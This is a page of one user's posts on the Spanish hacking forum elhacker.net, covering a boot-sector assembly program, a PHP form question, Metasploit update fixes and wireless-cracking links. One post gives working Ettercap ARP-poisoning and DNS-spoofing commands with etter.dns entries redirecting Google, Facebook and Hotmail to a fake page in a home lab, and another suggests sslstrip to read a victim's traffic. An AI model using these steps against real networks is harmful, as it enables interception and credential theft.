elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Mensajes
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14
51  Programación / ASM / Ya conseguí "arrancar" con mi primer bootloader, ¿ Y ahora que? en: 15 Septiembre 2012, 21:49 pm
Despues de varios dias y bastantes intentos, he logrado crear una imagen iso capaz de arrancar desde la BIOS, mi pregunta es ¿ cual sería el suiguiente paso lógico para hacer algo mas, como un mini kernel o algo así ?

lo cree con MASM 6.15 y la imagen ISO con MISO.


Por si le interesa a alguien dejo el código;

; compilar:  ml /AT /c /Zm primero.asm
; linkar :  LINK /TINY primero
; crear iso :  miso primero.iso -ab primero.com

.model tiny
  
COMSEG SEGMENT
org 7C00h      ; requerido por la BIOS
start:
 
        mov ax, 00h       
        mov ds, ax
         
        lea si,[ds: MyStr] ; si apunta a la cadena MyStr
        mov ah, 0Eh       ; para int 10 escribir pantalla   
        mov bh, 00h      ; numero pagina video
      mov cx,27      ; numero caracteres cadena MyStr
loopit: lodsb         ; carga AL con caracter incrementa SI
        int 10h         ; llamada bios
        LOOP loopit      ; decremente CX , repetir si CX no es cero
 
        jmp $                 
 
    MyStr db "Arranque creado por TomDiPe"
    db 510-($-start) dup (0)   ;Loads of zeroes
        dw 0AA55h             
 
COMSEG ENDS
end start
52  Programación / PHP / Re: capturando datos desde PHP esterno, no encuentra archivo [SOLUCIONADO] en: 12 Septiembre 2012, 13:27 pm
Desgraciadamente para mi, el problema era mas sencillo, acababa de instalar Apache en Win7 (normalmente lo uso en Ubuntu), y estaba haciendo las pruebas sin descargar PHP, y sin configurar httpd.conf para usarlo, problema resuelto.

Gracias por la respuesta.


53  Programación / PHP / capturando datos desde PHP esterno, no encuentra archivo [SOLUCIONADO] en: 12 Septiembre 2012, 09:33 am
Me explico, tengo dos archivos en la carpeta raiz de Apache;

index.html

<html><body>
Probando captura desde php externo
</body>

<FORM action=”chivato.php” method=”post” >  <P>
    Usuario:  <INPUT type="text" name="login"><BR>
    Password: <INPUT type="text" name="passwd"><BR>
     <INPUT type="submit" value="Enviar">

    </P>
 </FORM></html>


y chivato.php

<html>
<body>

Tu clave es <?php echo $_POST["passwg"]; ?>!<br />
tu usuario  <?php echo $_POST["login"]; ?>

</body>
</html>


la idea es que al pulsar el boton enviar, los datos sean capturados por el archivo chivato.php, pero la respuesta de los navegadores es siempre la misma:

Not Found
The requested URL /â€\chivato.php†was not found on this server.


No sé que estoy haciendo mal.
54  Seguridad Informática / Hacking / Re: Ocultar Ip. en: 11 Septiembre 2012, 18:46 pm
http://www.taringa.net/posts/linux/2143180/Como-instalar-el-Tor-y-configurar-Privoxy-_debian_ubuntu_.html
55  Seguridad Informática / Hacking Wireless / Re: WPA TKIP crackeada en minutos - ¿ Nueva tecnica llamada “Beck-Tews” ? en: 10 Septiembre 2012, 18:28 pm
Creo que tras el descubrimiento de este bug, se desarrolló Tkiptun-ng, la informacion de este programa está en: http://www.aircrack-ng.org/doku.php?id=tkiptun-ng

Y la base teórica aquí:
 http://download.aircrack-ng.org/wiki-files/doc/tkip_master.pdf

he visto un par de videos de Tkiptun-ng en YouTube, pero no he investigado demasiado.



56  Seguridad Informática / Hacking / Re: No funciona DNS Spoofing con Ettercap en: 10 Septiembre 2012, 15:05 pm
He probado el procedimiento solo funciona envenenado toda la red, pero con google parece imposible por ahora, he realizado la prueba con facebook y con hotmail y el DNS_SPOOF funciona perfectamente.

En mi caso
192.168.1.1  -->  Router
192.168.1.35 --> Bactrack
192.168.1.34 --> Victima (Win 7) (Pruebas con IExplorer 9 y Firefox 14

Extracto de etter.dns  -->

*.google.*                 A  192.168.1.35
*.facebook.*               A  192.168.1.35
*.hotmail.*                A  192.168.1.35
###############################################

Comienzo el ataque:

ettercap -T -q -P dns_spoof -M arp /192.168.1.1/ /192.168.1.34/

Consulto las tablas ARP en Win 7:
C:\Users\Tom>arp -a

Interfaz: 192.168.1.34 --- 0xb
  Dirección de Internet          Dirección física      Tipo
  192.168.1.1           08-00-27-1c-2d-bd     dinámico
  192.168.1.33          08-00-27-fd-7c-58     dinámico
  192.168.1.35          08-00-27-1c-2d-bd     dinámico

Vacio la cache de DNS en Win 7:
C:\Users\Tom>ipconfig /flushdns
     Configuración IP de Windows
     Se vació correctamente la caché de resolución de DNS.


Intento abric google,facebook y hotmail, no obteniendo los resultados esperados (DNSSPOOF),se siguen abriendo las páginas originales.

Si el envenenamiento lo realizo de la suiguiente manera:
ettercap -T -q -P dns_spoof -M arp // //

si funciona con facebook y con hotmail, pero curiosamente Google no es redireccionado hacia mi página falsa.

Si desde Windows analizo las resoluciones almacenadas hasta el momento,se observa que aunque la resolucion para google es la correcta (con mi etter.dns), la página no abre.
C:\Users\Tom>ipconfig /displaydns

    Configuración IP de Windows

    www.facebook.com
    ----------------------------------------
    Nombre de registro  . : www.facebook.com
    Tipo de registro  . . : 1
    Período de vida . . . : 3581
    Longitud de datos . . : 4
    Sección . . . . . . . : respuesta
    Un registro (host). . : 192.168.1.35


    www.hotmail.es
    ----------------------------------------
    Nombre de registro  . : www.hotmail.es
    Tipo de registro  . . : 1
    Período de vida . . . : 3590
    Longitud de datos . . : 4
    Sección . . . . . . . : respuesta
    Un registro (host). . : 192.168.1.35

    www.google.es
    ----------------------------------------
    Nombre de registro  . : www.google.es
    Tipo de registro  . . : 1
    Período de vida . . . : 3566
    Longitud de datos . . : 4
    Sección . . . . . . . : respuesta
    Un registro (host). . : 192.168.1.35

En ambos navegadores tengo como página de inicio predeterminada www.google.es, no se
si tiene algo que ver con el fallo del DNS_SPOOF.





57  Seguridad Informática / Hacking / Re: ¿Es posible...? en: 8 Septiembre 2012, 19:22 pm

Si intentas ver el trafico bajo SSL no veras demasiado, pero si como comentas eres capaz de hacerle un MITM, entonces puedes usar SSLSTRIP y pasar el trafico entre la victima y tu equipo a http, o sea texto plano.
58  Seguridad Informática / Hacking / Re: Problemas actualizando metasploit BackTrack 5R2 - svn cleanup [SOLUCIONADO] en: 8 Septiembre 2012, 12:04 pm
Tras un par de horas y un monton de comandos, he llegado a la conclusion que el problema ha llegado tras haber realizado el siguiente procedimiento para subir de R2 a  BT5-R3:

apt-get update && apt-get dist-upgrade

apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r artemisa rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack uberharvest acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler


La solucion encontrada ha sido reinstalar metasploit, con lo cual ya funciona perfectamente y permite las actualizaciónes con msfupdate.

apt-get remove metasploit --purge && apt-get install metasploit
59  Seguridad Informática / Hacking / Re: Problemas actualizando metasploit BackTrack 5R2 - svn cleanup en: 8 Septiembre 2012, 09:21 am
Acabo de intentarlo con el siguiente procedimiento y desaparecen la mayoria de errores, pero sigo sin poder actualizar.;

cd /opt/metasploit/common/lib
mv libcrypto.so.0.9.8 libcrypto.so.0.9.8-b
mv libssl.so.0.9.8 libssl.so.0.9.8-backup
ln -s /usr/lib/libcrypto.so.0.9.8
ln -s /usr/lib/libssl.so.0.9.8
msfupdate


pero el reultado es:

exec: msfupdate
 Attempting to update the Metasploit Framework...


svn: In directory 'lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.2/lib/active_record'
svn: Error processing command 'modify-wcprop' in 'lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.2/lib/active_record'
svn: 'lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.2/lib/active_record/relation.rb' is not under version control
svn: Working copy '.' locked
svn: run 'svn cleanup' to remove locks (type 'svn help cleanup' for details)
msf >


60  Seguridad Informática / Hacking / Problemas actualizando metasploit BackTrack 5R2 - svn cleanup [SOLUCIONADO] en: 8 Septiembre 2012, 09:12 am
Tras haber hecho una nueva instalacion de BT5R2 intento actualizar metasploit, pero me han salido todos estos errores, y no me permite actualizar.
¿ Sabe alguien como solucionarlo ?

msf > msfupdate

exec: msfupdate
Attempting to update the Metasploit Framework...
svn: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/common/lib/libserf-0.so.0)
svn: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/common/lib/libserf-0.so.0)
svn: In directory 'lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.2/lib/active_record'
svn: Error processing command 'modify-wcprop' in 'lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.2/lib/active_record'
svn: 'lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.2/lib/active_record/relation.rb' is not under version control
svn: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/common/lib/libserf-0.so.0)
svn: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/common/lib/libserf-0.so.0)
svn: Working copy '.' locked
svn: run 'svn cleanup' to remove locks (type 'svn help cleanup' for details)


msf > svn cleanup
  • exec: svn cleanup

svn: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/common/lib/libserf-0.so.0)
svn: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/common/lib/libserf-0.so.0)
svn: '.' is not a working copy directory
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines